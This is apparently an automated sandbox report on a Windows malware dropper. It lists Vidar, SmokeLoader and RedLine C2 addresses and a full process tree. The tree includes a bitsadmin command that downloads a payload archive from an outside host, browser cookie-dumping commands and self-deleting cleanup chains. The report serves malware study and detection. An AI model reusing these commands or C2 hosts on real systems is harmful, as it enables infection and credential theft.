Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1802s
  • max time network
    1815s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-08-2021 09:42

General

  • Target

    8 (9).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2_8_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Nirsoft 1 IoCs
  • Vidar Stealer 1 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 36 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 55 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2720
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2708
      • C:\Users\Admin\AppData\Local\Temp\8 (9).exe
        "C:\Users\Admin\AppData\Local\Temp\8 (9).exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4448
        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:5004
          • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\setup_install.exe
            "C:\Users\Admin\AppData\Local\Temp\7zSC8361504\setup_install.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:5076
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sonia_1.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4032
              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_1.exe
                sonia_1.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4192
                • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_1.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_1.exe" -a
                  6⤵
                  • Executes dropped EXE
                  PID:1124
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sonia_4.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3984
              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_4.exe
                sonia_4.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4208
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sonia_5.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3196
              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_5.exe
                sonia_5.exe
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                PID:4236
                • C:\Users\Admin\Documents\5NssNgtnU7M3s135qV5zI5Pr.exe
                  "C:\Users\Admin\Documents\5NssNgtnU7M3s135qV5zI5Pr.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1236
                  • C:\Users\Admin\Documents\5NssNgtnU7M3s135qV5zI5Pr.exe
                    "C:\Users\Admin\Documents\5NssNgtnU7M3s135qV5zI5Pr.exe"
                    7⤵
                    • Modifies data under HKEY_USERS
                    PID:5208
                • C:\Users\Admin\Documents\2YED6U_GcSMKOiJmOtkM9R6c.exe
                  "C:\Users\Admin\Documents\2YED6U_GcSMKOiJmOtkM9R6c.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1008
                • C:\Users\Admin\Documents\rmgfzvwUoNAx9zGu8sh0RcL0.exe
                  "C:\Users\Admin\Documents\rmgfzvwUoNAx9zGu8sh0RcL0.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1204
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 660
                    7⤵
                    • Program crash
                    PID:3844
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 676
                    7⤵
                    • Program crash
                    PID:2676
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 644
                    7⤵
                    • Program crash
                    PID:4212
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 660
                    7⤵
                    • Program crash
                    PID:3772
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 764
                    7⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Program crash
                    PID:3304
                • C:\Users\Admin\Documents\1u4LSc52RMY1dQa2h5QXObxK.exe
                  "C:\Users\Admin\Documents\1u4LSc52RMY1dQa2h5QXObxK.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:820
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    7⤵
                    • Executes dropped EXE
                    PID:1596
                • C:\Users\Admin\Documents\M_GuRs92JA4DhTAwlW3wzEDE.exe
                  "C:\Users\Admin\Documents\M_GuRs92JA4DhTAwlW3wzEDE.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:4908
                  • C:\Users\Admin\Documents\M_GuRs92JA4DhTAwlW3wzEDE.exe
                    "C:\Users\Admin\Documents\M_GuRs92JA4DhTAwlW3wzEDE.exe" -a
                    7⤵
                    • Executes dropped EXE
                    PID:4952
                • C:\Users\Admin\Documents\UY00KDFCgGNQflDDTDZje4Vf.exe
                  "C:\Users\Admin\Documents\UY00KDFCgGNQflDDTDZje4Vf.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4972
                  • C:\Users\Admin\Documents\UY00KDFCgGNQflDDTDZje4Vf.exe
                    "C:\Users\Admin\Documents\UY00KDFCgGNQflDDTDZje4Vf.exe"
                    7⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:1832
                • C:\Users\Admin\Documents\uAXjFL4HfhzL7DUq8EkVAGdq.exe
                  "C:\Users\Admin\Documents\uAXjFL4HfhzL7DUq8EkVAGdq.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  PID:2332
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                    7⤵
                      PID:188
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                      7⤵
                        PID:5208
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                        7⤵
                          PID:4964
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                          7⤵
                            PID:5760
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                            7⤵
                              PID:6016
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                              7⤵
                                PID:5704
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                7⤵
                                • Checks for any installed AV software in registry
                                PID:5932
                              • C:\Windows\SysWOW64\bitsadmin.exe
                                "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                7⤵
                                • Download via BitsAdmin
                                PID:5352
                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p9yxuhzdcsCQOsR1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                7⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                PID:5996
                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peUceGKxekxxDSRT -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                7⤵
                                  PID:5972
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                  7⤵
                                    PID:5196
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                    7⤵
                                      PID:2856
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                      7⤵
                                        PID:6036
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                        7⤵
                                          PID:1376
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                          7⤵
                                            PID:5916
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              8⤵
                                                PID:5352
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                              7⤵
                                              • Loads dropped DLL
                                              PID:4248
                                              • C:\Windows\system32\rundll32.exe
                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                8⤵
                                                • Loads dropped DLL
                                                • Drops file in System32 directory
                                                PID:3640
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                              7⤵
                                                PID:4000
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  8⤵
                                                  • Loads dropped DLL
                                                  • Modifies registry class
                                                  PID:6056
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:3248
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                                  7⤵
                                                  • Drops file in Program Files directory
                                                  PID:4636
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:2244
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv132D.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:4100
                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                      7⤵
                                                      • Loads dropped DLL
                                                      PID:5204
                                                  • C:\Users\Admin\Documents\mWYIp5UEERSorCJIquOW25D4.exe
                                                    "C:\Users\Admin\Documents\mWYIp5UEERSorCJIquOW25D4.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:4404
                                                    • C:\Users\Admin\Documents\mWYIp5UEERSorCJIquOW25D4.exe
                                                      "{path}"
                                                      7⤵
                                                        PID:5640
                                                    • C:\Users\Admin\Documents\T2pYQwI5Gj0PmjKgEIwHLJ7Z.exe
                                                      "C:\Users\Admin\Documents\T2pYQwI5Gj0PmjKgEIwHLJ7Z.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:4940
                                                    • C:\Users\Admin\Documents\SZzm1JW6mSwB2VxP5fNbd_Or.exe
                                                      "C:\Users\Admin\Documents\SZzm1JW6mSwB2VxP5fNbd_Or.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:3980
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 660
                                                        7⤵
                                                        • Program crash
                                                        PID:4360
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 676
                                                        7⤵
                                                        • Program crash
                                                        PID:5048
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 720
                                                        7⤵
                                                        • Program crash
                                                        PID:4568
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 692
                                                        7⤵
                                                        • Program crash
                                                        PID:4992
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 1080
                                                        7⤵
                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                        • Program crash
                                                        PID:2672
                                                    • C:\Users\Admin\Documents\_DWSNhxZ0ocz3ACVLN6HcIps.exe
                                                      "C:\Users\Admin\Documents\_DWSNhxZ0ocz3ACVLN6HcIps.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4564
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4584
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:1884
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:5180
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:5132
                                                          • C:\Users\Admin\Documents\dQ_uahFEHBS4XM4temEZaYpU.exe
                                                            "C:\Users\Admin\Documents\dQ_uahFEHBS4XM4temEZaYpU.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4000
                                                            • C:\Users\Admin\Documents\dQ_uahFEHBS4XM4temEZaYpU.exe
                                                              C:\Users\Admin\Documents\dQ_uahFEHBS4XM4temEZaYpU.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4144
                                                            • C:\Users\Admin\Documents\dQ_uahFEHBS4XM4temEZaYpU.exe
                                                              C:\Users\Admin\Documents\dQ_uahFEHBS4XM4temEZaYpU.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:1016
                                                          • C:\Users\Admin\Documents\CeLGZ11LNbB1oHDCoDteoFDT.exe
                                                            "C:\Users\Admin\Documents\CeLGZ11LNbB1oHDCoDteoFDT.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4828
                                                            • C:\Users\Admin\Documents\CeLGZ11LNbB1oHDCoDteoFDT.exe
                                                              "{path}"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5060
                                                            • C:\Users\Admin\Documents\CeLGZ11LNbB1oHDCoDteoFDT.exe
                                                              "{path}"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:6040
                                                            • C:\Users\Admin\Documents\CeLGZ11LNbB1oHDCoDteoFDT.exe
                                                              "{path}"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks processor information in registry
                                                              PID:6112
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im CeLGZ11LNbB1oHDCoDteoFDT.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\CeLGZ11LNbB1oHDCoDteoFDT.exe" & del C:\ProgramData\*.dll & exit
                                                                8⤵
                                                                  PID:5680
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im CeLGZ11LNbB1oHDCoDteoFDT.exe /f
                                                                    9⤵
                                                                    • Kills process with taskkill
                                                                    PID:4984
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 6
                                                                    9⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:1012
                                                            • C:\Users\Admin\Documents\XrJRFfTaHlYcKx3CIhPnkBzb.exe
                                                              "C:\Users\Admin\Documents\XrJRFfTaHlYcKx3CIhPnkBzb.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks processor information in registry
                                                              PID:3480
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im XrJRFfTaHlYcKx3CIhPnkBzb.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\XrJRFfTaHlYcKx3CIhPnkBzb.exe" & del C:\ProgramData\*.dll & exit
                                                                7⤵
                                                                  PID:5712
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im XrJRFfTaHlYcKx3CIhPnkBzb.exe /f
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Kills process with taskkill
                                                                    PID:1884
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 6
                                                                    8⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:864
                                                              • C:\Users\Admin\Documents\ixeefYAK2iHeywWQ5WwbpwMW.exe
                                                                "C:\Users\Admin\Documents\ixeefYAK2iHeywWQ5WwbpwMW.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3684
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                  7⤵
                                                                    PID:5432
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im chrome.exe
                                                                      8⤵
                                                                      • Kills process with taskkill
                                                                      PID:6116
                                                                • C:\Users\Admin\Documents\eP37F6bCvhh06gLpgdhoaMgW.exe
                                                                  "C:\Users\Admin\Documents\eP37F6bCvhh06gLpgdhoaMgW.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Modifies registry class
                                                                  PID:2636
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4400
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4608
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:5240
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:5448
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:4212
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                          PID:5468
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:5712
                                                                        • C:\Users\Admin\Documents\SF0aB31ZaoffyKSW8oI7RNI6.exe
                                                                          "C:\Users\Admin\Documents\SF0aB31ZaoffyKSW8oI7RNI6.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:4240
                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Drops startup file
                                                                            PID:4716
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:2180
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:4904
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5864
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                              8⤵
                                                                                PID:5340
